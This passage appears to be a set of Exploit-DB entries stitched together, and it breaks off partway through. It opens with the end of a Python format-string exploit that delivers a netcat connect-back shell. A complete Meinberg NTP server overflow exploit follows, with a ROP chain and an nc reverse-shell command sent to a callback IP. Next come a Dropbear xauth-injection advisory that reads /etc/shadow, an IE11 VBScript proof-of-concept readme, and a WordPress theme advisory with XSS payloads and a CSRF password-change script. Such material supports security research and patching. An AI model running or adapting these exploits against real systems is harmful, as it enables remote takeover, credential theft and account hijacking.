elif NCSH1:
POP1 = target[Key][2]
POP2 = target[Key][3]
POP3 = target[Key][4]
POP4 = target[Key][5]
POP2_SIZE = 2
# FirstWhat writes with 4 bytes (Y) (0x0002YYYY)
# SecondWhat writes with 1 byte (Z) (0x00ZZYYYY)
if BSShex > 0x10000:
MSB = 1
else:
MSB = 0
# We need to count higher than provided address for the jump
BaseAddr = 0x10000 + BSShex
# Calculate for creating the FMS code
ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE)
GOTint = (GOTint - ALREADY_WRITTEN)
ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + POP2_SIZE + (POP3 * POP_SIZE)
# Calculate FirstWhat value
FirstWhat = BaseAddr - (ALREADY_WRITTEN)
ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + (POP4 * POP_SIZE)
# Calculate SecondWhat value, so it always is 0x203[00] or [01]
SecondWhat = 0x20300 - (ALREADY_WRITTEN) + MSB
shell = shellcode_db(rhost,verbose).sc(target[Key][6])
shell = shell.replace("LHOST",lhost)
shell = shell.replace("LPORT",lport)
GOTint = GOTint - len(shell)
# if verbose:
# print "[Verbose] Calculated GOTint:",GOTint,"Calculated FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat
else:
print "[!] NCSH missing, exiting"
sys.exit(1)
#
# Let's start the exploiting procedure
#
#
# Stage one
#
if NCSH1 or NCSH2:
# "New Style" needs to make the exploit in two stages
if NCSH2:
FMScode = do_FMS(rhost,verbose)
# Writing 'FirstWhere' and 'SecondWhere'
# 1st request
FMScode.AddADDR(GOTint) # Run up to free() GOT address
#
# 1st and 2nd "Write-Where"
FMScode.AddDirectParameterN(POP1) # Write 1st Where
FMScode.Add("XX") # Jump up two bytes for next address
FMScode.AddDirectParameterN(POP2) # Write 2nd Where
FMSdata = FMScode.FMSbuild()
else:
FMSdata = ""
print "[>] StG_1: Preparing netcat connect back shell to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata))
else:
print "[>] StG_1: Sending and decoding shellcode to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata))
# Inject our encoded shellcode to be decoded in MIPS/CRISv32/ARM
# Actually, any valid and public readable .shtml file will work...
# (One of the two below seems always to be usable)
#
# For NCSH1 shell, we only check if the remote file are readable, for usage in Stage two
# For NCSH2, 1st and 2nd (Write-Where) FMS comes here, and calculations start after '=' in the url
#
try:
target_url = "/httpDisabled.shtml?user_agent="
if noexploit:
target_url2 = target_url
else:
target_url2 = "/httpDisabled.shtml?&http_user="
if NCSH2:
html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
else:
html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)
except urllib2.HTTPError as e:
if e.code == 404:
print "[<] Error",e.code,e.reason
target_url = "/view/viewer_index.shtml?user_agent="
if noexploit:
target_url2 = target_url
else:
target_url2 = "/view/viewer_index.shtml?&http_user="
print "[>] Using alternative target shtml"
if NCSH2:
html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
else:
html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)
except Exception as e:
if not NCSH2:
print "[!] Shellcode delivery failed:",str(e)
sys.exit(1)
#
# Stage two
#
#
# Building and sending the FMS code to the target
#
print "[i] Building the FMS code..."
FMScode = do_FMS(rhost,verbose)
# This is an 'One-Write-Where-And-What' for FMS
#
# Stack Example:
#
# Stack content | Stack address (ASLR)
#
# 0x0 | @0x7e818dbc -> [POP1's]
# 0x0 | @0x7e818dc0 -> [free () GOT address]
# 0x7e818dd0 | @0x7e818dc4>>>>>+ "Write-Where" (%n)
# 0x76f41fb8 | @0x7e818dc8 | -> [POP2's]
# 0x76f3d70c | @0x7e818dcc | -> [BSS shell code address]
# 0x76f55ab8 | @0x7e818dd0<<<<<+ "Write-What" (%n)
# 0x1 | @0x7e818dd4
#
if not NCSH1 and not NCSH2:
FMScode.AddPOP(POP1) # 1st serie of 'Old Style' POP's
FMScode.AddADDR(GOTint) # GOT Address
FMScode.AddWRITEn(1) # 4 bytes Write-Where
# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx)
FMScode.AddPOP(POP2) # 2nd serie of 'Old Style' POP's
FMScode.AddADDR(BSSint) # BSS shellcode address
FMScode.AddWRITEn(1) # 4 bytes Write-What
# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx)
# End of 'One-Write-Where-And-What'
# This is an 'Two-Write-Where-And-What' for FMS
#
# Netcat shell and FMS code in same request, we will jump to the SSI function <!--#exec cmd="xxx" -->
# We jump over all SSI tagging to end up directly where "xxx" will
# be the string passed on to SSI exec function ('/bin/sh -c', pipe(), vfork() and execv())
#
# The Trick here is to write lower target address, that we will jump to when calling free(),
# than the FMS has counted up to, by using Two-Write-Where-and-What with two writes to free() GOT
# address with two LSB writes.
#
elif NCSH2:
#
# Direct parameter access for FMS exploitation are really nice and easy to use.
# However, we need to exploit in two stages with two requests.
# (I was trying to avoid this "Two-Stages" so much as possibly in this exploit developement...)
#
# 1. Write "Two-Write-Where", where 2nd is two bytes higher than 1st (this allows us to write to MSB and LSB)
# 2. Write with "Two-Write-What", where 1st (LSB) and 2nd (MSB) "Write-Where" pointing to.
#
# With "new style", we can write with POPs independently as we don't depended of same criteria as in "NCSH1",
# we can use any regular "Stack-to-Stack" pointer as we can freely choose the POP-and-Write.
# [Note the POP1/POP2 (low-high) vs POP3/POP4 (high-low) difference.]
#
# Stack Example:
#
# Stack content | Stack address (ASLR)
#
# 0x7e818dd0 | @0x7e818dc4>>>>>+ 1st "Write-Where" [@Stage One]
# 0x76f41fb8 | @0x7e818dc8 |
# 0x76f3d70c | @0x7e818dcc |
# 0x76f55ab8 | @0x7e818dd0<<<<<+ 1st "Write-What" [@Stage Two]
# 0x1 | @0x7e818dd4
# [....]
# 0x1c154 | @0x7e818e10
# 0x7e818e20 | @0x7e818e14>>>>>+ 2nd "Write-Where" [@Stage One]
# 0x76f41fb8 | @0x7e818e18 |
# 0x76f3d70c | @0x7e818e1c |
# 0x76f55758 | @0x7e818e20<<<<<+ 2nd "Write-What" [@Stage Two]
# 0x1 | @0x7e818e24
#
FMScode.Add(shell)
#
# 1st and 2nd "Write-Where" already done in stage one
#
# 1st and 2nd "Write-What"
#
FMScode.AddADDR(GOTint + FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.
FMScode.AddDirectParameterN(POP3) # Write with 4 bytes (we want to zero out in MSB)
FMScode.AddADDR(SecondWhat + 3) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)
FMScode.AddDirectParameterHHN(POP4) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation
elif NCSH1:
# Could use direct argument addressing here, but I like to keep "old style" as well,
# as it's another interesting concept.
#
# Two matching stack contents -> stack address in row w/o or max two POP's between,
# is needed to write two bytes higher (MSB).
#
#
# Stack Example:
#
# Stack Content | @Stack Address (ASLR)
#
# 0x9c | @7ef2fde8 -> [POP1's]
# [....]
# 0x1 | @7ef2fdec -> [GOTint address]
#------
# 0x7ef2fe84 | @7ef2fdf0 >>>>>+ Write 'FirstWhere' (%n) [LSB]
# -> 'XX' | two bytes (Can be one or two POP's as well, by using %2c or %1c%1c as POPer)
# 0x7ef2fe8c | @7ef2fdf4 >>>>>>>>>+ Write 'SecondWhere' (%n) [MSB]
# ------ | |
# [....] -> [POP3's] | |
# 0x7fb99dc | @7ef2fe7c | |
# 0x7ef2fe84 | @7ef2fe80 | | [Count up to 0x2XXXX]
# 0x7ef2ff6a | @7ef2fe84 <<<<<+ | Write 'XXXX' 'FirstWhat' (%n) (0x0002XXXX))
# -> [POP4's] |
# (nil) | @7ef2fe88 | [Count up to 0x20300]
# 0x7ef2ff74 | @7ef2fe8c <<<<<<<<<+ Write 'ZZ' 'SecondWhat' (%hhn) (0x00ZZXXXX)
FMScode.Add(shell)
# Write FirstWhere for 'FirstWhat'
FMScode.AddPOP(POP1)
FMScode.AddADDR(GOTint) # Run up to free() GOT address
FMScode.AddWRITEn(1)
# Write SecondWhere for 'SecondWhat'
#
# This is special POP with 1 byte, we can maximum POP 2!
#
# This POP sequence is actually no longer used in this part of exploit, was developed to meet the requirement
# for exploitation of 5.2.x and 5.40.x, as there needed to be one POP with maximum of two bytes.
# Kept as reference as we now using direct parameter access AKA 'New Style" for 5.2x/5.4x
#
if POP2 != 0:
# We only want to write 'SecondWhat' two bytes higher at free() GOT
if POP2 > 2:
print "POP2 can't be greater than two!"
sys.exit(1)
if POP2 == 1:
FMScode.Add("%2c")
else:
FMScode.Add("%1c%1c")
else:
FMScode.Add("XX")
FMScode.AddWRITEn(1)
# Write FirstWhat pointed by FirstWhere
FMScode.AddPOP(POP3) # Old Style POP's
FMScode.AddADDR(FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.
FMScode.AddWRITEn(1) # Write with 4 bytes (we want to zero out in MSB)
# Write SecondWhat pointed by SecondWhere
FMScode.AddPOP(POP4) # Old Style POP's
FMScode.AddADDR(SecondWhat) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)
FMScode.AddWRITEhhn(1) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation
else:
sys.exit(1)
FMSdata = FMScode.FMSbuild()
print "[>] StG_2: Writing shellcode address to free() GOT address:",'0x{:08x}'.format(GOThex),"(%d bytes)" % (len(FMSdata))
# FMS comes here, and calculations start after '=' in the url
try:
if NCSH1 or NCSH2:
html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
else:
html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url2 + FMSdata) # MIPS/CRIS shellcode
except urllib2.HTTPError as e:
print "[!] Payload delivery failed:",str(e)
sys.exit(1)
except Exception as e:
# 1st string returned by HTTP mode, 2nd by HTTPS mode
if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
print "[i] Timeout! Payload delivered sucessfully!"
else:
print "[!] Payload delivery failed:",str(e)
sys.exit(1)
if noexploit:
print "\n[*] Not exploiting, no shell...\n"
else:
print "\n[*] All done, enjoy the shell...\n"
#
# [EOF]
#
#!/usr/bin/python
#
# EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit
# EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/
#
# 271 - trigger notifications
# 299 - copy user defined notifications
# Kernel Version: 2.6.15.1
# System Version: 530
# Lantime configuration utility 1.27
# ELX800/GPS M4x V5.30p
import socket
import struct
import telnetlib
import sys
import time
if len(sys.argv) < 3:
print "[-] <Host> <Callback IP> "
exit(1)
host = sys.argv[1]
callback_ip = sys.argv[2]
print "[+] exploiting Meinburg M400"
port = 80
###################################################################
#
# Copy user_defined_notification to /www/filetmp
# Append reverse shell string to /file/tmp
#
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )
param = "A" * 0x2850
resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"
system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8
#must have a listener setup to receive the callback connection on ip 192.168.60.232
# i.e. nc -v -l -p 4444
command = 'cp /mnt/flash/config/user_defined_notification /www/filetmp; echo "{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash</tmp/foo|{nc,' + callback_ip +'0,4444}>/tmp/foo;" >> /www/filetmp'
msg = "button=" + "A"*10028
msg += struct.pack("I", system )
msg += struct.pack("I", exit )
msg += struct.pack("I", some_str )
msg += command + "\x00"
resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg
csock.send(resp)
csock.close()
time.sleep(1)
###################################################################
#
# Copy /www/filetmp to user_defined_notification
#
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )
param = "A" * 0x2850
resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"
send_cmd = 0x807ED88
system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8
ret = 0x804CE65
#stack pivot
stack_pivot = 0x8049488
msg = "button=" + "A" * 9756
msg += "B" * 28
msg += struct.pack("I", 0x7FFEE01A ) # ebp
msg += struct.pack("I", 0x0804ce64 ) # pop eax ; ret
msg += struct.pack("I", some_str - 0x100 ) # some place
msg += struct.pack("I", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret
msg += struct.pack("I", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret
msg += struct.pack("I", ret ) * (71/4)
msg += struct.pack("I", send_cmd )
msg += struct.pack("I", exit )
msg += struct.pack("I", 0x80012111 ) # [eax + 0x60]
msg += struct.pack("I", some_str ) # buffer
msg += struct.pack("I", 0xffffffff ) # count
msg += "E" * 120
msg += struct.pack("I", 0xB1E8B434 ) # ebx
msg += struct.pack("I", some_str - 100 ) # esi
msg += struct.pack("I", some_str - 100 ) # edi
msg += struct.pack("I", some_str - 0x100 ) # ebp
msg += struct.pack("I", stack_pivot ) # mov esp, ebp ; ret
msg += "A" * 100
resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg
csock.send(resp)
csock.close
time.sleep(1)
###################################################################
#
# Trigger reverse shell
#
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )
param = "A" * 0x2850
resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"
send_cmd = 0x807ED88
system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8
ret = 0x804CE65
#stack pivot
stack_pivot = 0x8049488
msg = "button=" + "A" * 9756
msg += "B" * 28
msg += struct.pack("I", 0x7FFEE01A ) # ebp
msg += struct.pack("I", 0x0804ce64 ) # pop eax ; ret
msg += struct.pack("I", some_str - 0x100 ) # some place
msg += struct.pack("I", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret
msg += struct.pack("I", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret
msg += struct.pack("I", ret ) * (71/4)
msg += struct.pack("I", send_cmd )
msg += struct.pack("I", exit )
msg += struct.pack("I", 0x800120f5 ) # [eax + 0x60]
msg += struct.pack("I", some_str ) # buffer
msg += struct.pack("I", 0xffffffff ) # count
msg += "E" * 120
msg += struct.pack("I", 0xB1E8B434 ) # ebx
msg += struct.pack("I", some_str - 100 ) # esi
msg += struct.pack("I", some_str - 100 ) # edi
msg += struct.pack("I", some_str - 0x100 ) # ebp
msg += struct.pack("I", stack_pivot ) # mov esp, ebp ; ret
msg += "A" * 100
resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg
csock.send(resp)
csock.close()
time.sleep(1)
print "[+] cleaning up"
###################################################################
#
# Kill all mains that are hung-up
#
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )
param = "A" * 0x2850
resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"
system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8
command = 'killall main'
msg = "button=" + "A"*10028
msg += struct.pack("I", system )
msg += struct.pack("I", exit )
msg += struct.pack("I", some_str )
msg += command + "\x00"
resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg
csock.send(resp)
csock.close()
print "[+] enjoy"
VuNote
============
Author: <github.com/tintinweb>
Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3116
Version: 0.2
Date: Mar 3rd, 2016
Tag: dropbearsshd xauth command injection may lead to forced-command bypass
Overview
--------
Name: dropbear
Vendor: Matt Johnston
References: * https://matt.ucc.asn.au/dropbear/dropbear.html [1]
Version: 2015.71
Latest Version: 2015.71
Other Versions: <= 2015.71 (basically all versions with x11fwd support; v0.44 ~11 years)
Platform(s): linux
Technology: c
Vuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')
Origin: remote
Min. Privs.: post auth
CVE: CVE-2016-3116
Description
---------
quote website [1]
>Dropbear is a relatively small SSH server and client. It runs on a variety of POSIX-based platforms. Dropbear is open source software, distributed under a MIT-style license. Dropbear is particularly useful for "embedded"-type Linux (or other Unix) systems, such as wireless routers.
Summary
-------
An authenticated user may inject arbitrary xauth commands by sending an
x11 channel request that includes a newline character in the x11 cookie.
The newline acts as a command separator to the xauth binary. This attack requires
the server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector.
By injecting xauth commands one gains limited* read/write arbitrary files,
information leakage or xauth-connect capabilities. These capabilities can be
leveraged by an authenticated restricted user - e.g. one with configured forced-commands - to bypass
account restriction. This is generally not expected.
The injected xauth commands are performed with the effective permissions of the
logged in user as the sshd already dropped its privileges.
Quick-Info:
* requires: X11Forwarding yes
* does *NOT* bypass /bin/false due to special treatment (like nologin)
* bypasses forced-commands (allows arbitr. read/write)
Capabilities (xauth):
* Xauth
* write file: limited chars, xauthdb format
* read file: limit lines cut at first \s
* infoleak: environment
* connect to other devices (may allow port probing)
see attached PoC
Details
-------
// see annotated code below
* x11req (svr-x11fwd.c:46)
* execchild (svr-chansession.c:893)
*- x11setauth (svr-x11fwd.c:129)
Upon receiving an `x11-req` type channel request dropbearsshd parses the channel request
parameters `x11authprot` and `x11authcookie` from the client ssh packet where
`x11authprot` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)
and `x11authcookie` contains the actual x11 auth cookie. This information is stored
in a session specific datastore. When calling `execute` on that session, dropbear will
call `execchild` and - in case it was compiled with x11 support - setup x11 forwarding
by executing `xauth` with the effective permissions of the user and pass commands via `stdin`.
Note that `x11authcookie` nor `x11authprot` was sanitized or validated, it just contains
user-tainted data. Since `xauth` commands are passed via `stdin` and `\n` is a
command-separator to the `xauth` binary, this allows a client to inject arbitrary
`xauth` commands.
This is an excerpt of the `man xauth` [2] to outline the capabilities of this xauth
command injection:
SYNOPSIS
xauth [ -f authfile ] [ -vqibn ] [ command arg ... ]
add displayname protocolname hexkey
generate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]
[n]extract filename displayname...
[n]list [displayname...]
[n]merge [filename...]
remove displayname...
source filename
info
exit
quit
version
help
?
Interesting commands are:
info - leaks environment information / path
~# xauth info
xauth: file /root/.Xauthority does not exist
Authority file: /root/.Xauthority
File new: yes
File locked: no
Number of entries: 0
Changes honored: yes
Changes made: no
Current input: (argv):1
source - arbitrary file read (cut on first `\s`)
# xauth source /etc/shadow
xauth: file /root/.Xauthority does not exist
xauth: /etc/shadow:1: unknown command "smithj:Ep6mckrOLChF.:10063:0:99999:7:::"
extract - arbitrary file write
* limited characters
* in xauth.db format
* since it is not compressed it can be combined with `xauth add` to
first store data in the database and then export it to an arbitrary
location e.g. to plant a shell or do other things.
generate - connect to <ip>:<port> (port probing, connect back and pot. exploit
vulnerabilities in X.org
Source
------
Inline annotations are prefixed with `//#!`
* handle x11 request, stores cookie in `chansess`
```c
/* called as a request for a session channel, sets up listening X11 */
/* returns DROPBEAR_SUCCESS or DROPBEAR_FAILURE */
int x11req(struct ChanSess * chansess) {
int fd;
/* we already have an x11 connection */
if (chansess->x11listener != NULL) {
return DROPBEAR_FAILURE;
}
chansess->x11singleconn = buf_getbyte(ses.payload);
chansess->x11authprot = buf_getstring(ses.payload, NULL); //#! store user tainted data
chansess->x11authcookie = buf_getstring(ses.payload, NULL); //#! store user tainted data
chansess->x11screennum = buf_getint(ses.payload);
```
* set auth cookie/authprot
```c
/* This is called after switching to the user, and sets up the xauth
* and environment variables. */
void x11setauth(struct ChanSess *chansess) {
char display[20]; /* space for "localhost:12345.123" */
FILE * authprog = NULL;
int val;
if (chansess->x11listener == NULL) {
return;
}
...
/* popen is a nice function - code is strongly based on OpenSSH's */
authprog = popen(XAUTH_COMMAND, "w"); //#! run xauth binary
if (authprog) {
fprintf(authprog, "add %s %s %s\n",
display, chansess->x11authprot, chansess->x11authcookie); //#! \n injection in cookie, authprot
pclose(authprog);
} else {
fprintf(stderr, "Failed to run %s\n", XAUTH_COMMAND);
}
}
```
Proof of Concept
----------------
Prerequisites:
* install python 2.7.x
* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x
* run `poc.py`
Note: see cve-2016-3115 [3] for `poc.py`
Usage: <host> <port> <username> <password or path_to_privkey>
path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key
poc:
1. configure one user (user1) for `force-commands`:
```c
#PUBKEY line - force commands: only allow "whoami"
#cat /home/user1/.ssh/authorized_keys
command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box
#cat /etc/passwd
user1:x:1001:1001:,,,:/home/user1:/bin/bash
```
2. run dropbearsshd (x11fwd is on by default)
```c
#> ~/dropbear-2015.71/dropbear -R -F -E -p 2222
[22861] Not backgrounding
[22862] Child connection from 192.168.139.1:49597
[22862] Forced command 'whoami'
[22862] Pubkey auth succeeded for 'user1' with key md5 dc:b8:56:71:89:36:fb:dc:0e:a0:2b:17:b9:83:d2:dd from 192.168.139.1:49597
```
3. `forced-commands` - connect with user1 and display env information
```c
#> python <host> 2222 user1 .demoprivkey
INFO:__main__:add this line to your authorized_keys file:
#PUBKEY line - force commands: only allow "whoami"
#cat /home/user/.ssh/authorized_keys
command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box
INFO:__main__:connecting to: user1:<PKEY>@192.168.139.129:2222
INFO:__main__:connected!
INFO:__main__:
Available commands:
.info
.readfile <path>
.writefile <path> <data>
.exit .quit
<any xauth command or type help>
#> .info
DEBUG:__main__:auth_cookie: '\ninfo'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:Authority file: /home/user1/.Xauthority
File new: no
File locked: no
Number of entries: 2
Changes honored: yes
Changes made: no
Current input: (stdin):2
user1
/usr/bin/xauth: (stdin):1: bad "add" command line
...
```
4. `forced-commands` - read `/etc/passwd`
```c
...
#> .readfile /etc/passwd
DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...
```
5. `forced-commands` - write `/tmp/testfile`
```c
#> .writefile /tmp/testfile1 `thisisatestfile`
DEBUG:__main__:auth_cookie: '\nadd 127.0.0.250:65500 `thisisatestfile` aa'
DEBUG:__main__:dummy exec returned: None
DEBUG:__main__:auth_cookie: '\nextract /tmp/testfile1 127.0.0.250:65500'
DEBUG:__main__:dummy exec returned: None
DEBUG:__main__:user1
/usr/bin/xauth: (stdin):1: bad "add" command line
#> INFO:__main__:/tmp/testfile1
#> ls -lsat /tmp/testfile1
4 -rw------- 1 user1 user1 59 xx xx 12:51 /tmp/testfile1
#> cat /tmp/testfile1
ú65500hiú65500`thisisatestfile`ªr
```
6. `forced-commands` - initiate outbound X connection to 8.8.8.8:6100
```c
#> generate 8.8.8.8:100
DEBUG:__main__:auth_cookie: '\ngenerate 8.8.8.8:100'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:user1
/usr/bin/xauth: (stdin):1: bad "add" command line
/usr/bin/xauth: (stdin):2: unable to open display "8.8.8.8:100".
#> tcpdump
IP <host> 8.8.8.8.6100: Flags [S], seq 81800807, win 29200, options [mss 1460,sackOK,TS val 473651893 ecr 0,nop,wscale 10], length 0
```
Fix
---
* Sanitize user-tainted input `chansess->x11authcookie`
Mitigation / Workaround
------------------------
* disable x11-forwarding: re-compile without x11 support: remove `options.h` -> `#define ENABLE_X11FWD`
Notes
-----
Thanks to the OpenSSH team for coordinating the fix!
Vendor response see: changelog [4]
References
----------
[1] https://matt.ucc.asn.au/dropbear/dropbear.html
[2] http://linux.die.net/man/1/xauth
[3] https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115/
[4] https://matt.ucc.asn.au/dropbear/CHANGES
Contact
-------
https://github.com/tintinweb
Source: https://github.com/theori-io/cve-2016-0189
# CVE-2016-0189
Proof-of-Concept exploit for CVE-2016-0189 (VBScript Memory Corruption in IE11)
Tested on Windows 10 IE11.
### Write-up
http://theori.io/research/cve-2016-0189
### To run
1. Download `support/*.dll` (or compile \*.cpp for yourself) and `exploit/*.html` to a directory.
2. Serve the directory using a webserver (or python's simple HTTP server).
3. Browse with a victim IE to `vbscript_bypass_pm.html`.
4. (Re-fresh or re-open in case it doesn't work; It's not 100% reliable.)
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40118.zip
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=== LSE Leading Security Experts GmbH - Security Advisory 2016-01-01 ===
Wordpress ProjectTheme Multiple Vulnerabilities
- - ------------------------------------------------------------
Affected Version
================
Project Theme: 2.0.9.5
Problem Overview
================
Technical Risk: high
Likelihood of Exploitation: low
Vendor: http://sitemile.com/
Credits: LSE Leading Security Experts GmbH employee Tim Herres
Advisory: https://www.lsexperts.de/advisories/lse-2016-01-01.txt
Advisory Status: public
CVE-Number: [NA yet]
Problem Impact
==============
During an internal code review multiple vulnerabilities were identified.
The whole application misses input validation and output encoding. This means user supplied input is inserted in a unsafe way.
This could allow a remote attacker to easily compromise user accounts.
Example:
An authenticated user sends a private message to another user.
When the attacker injects JavaScript Code, it will automatically call the CSRF Proc below.
The only necessary information is the user id, which can be identified easily, see below.
If the other user opens the private message menu, the JavaScript code gets executed and the Password will be changed. It is not necessary to open the message.
Now the attacker can access the account using the new password.
Problem Description
===================
The following findings are only examples, the whole application should be reviewed for similar vulnerabilities.
#Stored Cross Site Scripting:
Creating a new project http://[URL]/post-new/? in the project title and description field.
Insert JavaScript code inside the project message board:
POST /?get_message_board=34 HTTP/1.1
sumbit_message=1&my_message=TestMessagBoard<script>alert("stored_xss")</script>
Also in the private message in the subject or in the message field. The payload in the Subject will be executed, if the user opens the private message list.
#Reflected Cross Site Scripting:
http://[IP]/advanced-search/?term=asdf&%22%3E%3Cscript%3Ealert%2811%29%3C%2fscript%3E
# No protection against Cross Site Request Forgery Attacks
There is no Cross Site Request Forgery protection.
Also the user password can be changed without knowledge of the current password.
A possible CSRF attack form, which will change the users password to "test":
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://[ip]/my-account/personal-information/", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundarywXBZovhmb3VnFJdz");
xhr.setRequestHeader("Accept-Language", "de-DE,de;q=0.8,en-US;q=0.6,en;q=0.4");
xhr.withCredentials = true;
var body = "------WebKitFormBoundarywXBZovhmb3VnFJdz\r\n" +
"Content-Disposition: form-data; name=\"project_location_cat\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundarywXBZovhmb3VnFJdz\r\n" +
"Content-Disposition: form-data; name=\"user_city\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundarywXBZovhmb3VnFJdz\r\n" +
"Content-Disposition: form-data; name=\"user_description\"\r\n" +
"\r\n" +
"\r\n" +
